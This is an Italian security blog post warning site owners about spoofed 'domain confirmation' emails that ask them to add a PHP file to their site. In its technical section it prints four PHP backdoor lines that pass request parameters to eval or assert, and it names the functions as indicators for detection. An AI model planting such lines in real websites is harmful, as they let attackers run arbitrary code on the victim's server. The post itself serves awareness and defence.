Non fidatevi di quelle false email di conferma del dominio.
Se mai doveste ricevere una lettera di qualsiasi tipo che vi chieda di creare, scaricare o installare del codice PHP sul vostro sito web, dovete ignorarla.
English version: Do not trust those fake domain confirmation emails
Di recente alcuni miei clienti hanno ricevuto strane email dai loro registrar di domini. Queste email contenevano una richiesta di conferma per i loro domini. Ho controllato una di queste email e l'ho subito identificata come fraudolenta . Tutte le email presentavano uno schema identico e richiedevano la creazione di un file PHP nella cartella principale di un sito web con un nome specifico e un contenuto predefinito. Inutile dire che il contenuto suggerito per quel file PHP conteneva codice dannoso, noto come backdoor. Questo tipo di codice permette all'attaccante di eseguire qualsiasi azione desideri sul sito web della vittima.
Se mai doveste ricevere una lettera di qualsiasi tipo che vi chieda di creare, scaricare o installare del codice PHP sul vostro sito web, dovete ignorarla. Senza eccezioni. Nemmeno se la lettera proviene dal presidente o da vostra madre.
Le email fraudolente sembrano legittime perché il mittente appare autentico. Ma si tratta di spoofing. Non ti aspetteresti di ricevere un'email falsa dai tuoi amici o dal tuo registrar di domini, vero? Sbagliato! Qualsiasi email può contenere un indirizzo del mittente qualsiasi. La maggior parte dei server e dei client di posta elettronica non controlla né verifica l'indirizzo del mittente. Quindi, potresti pensare che si tratti di un tentativo di hacker. Non dovresti mai fidarti di un'email ricevuta da un mittente conosciuto se contiene una richiesta di azioni sospette, come l'installazione di codice sul tuo sito web o di un'applicazione sul tuo computer.
Dettagli tecnici
Le email false di solito contengono alcune delle seguenti righe di codice PHP.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
Per vostra informazione: base64_decode, eval e assert sono indicatori ben noti di codice PHP sospetto o dannoso.
Vedi anche: Plugin Inspector rivela problemi di sicurezza con altri plugin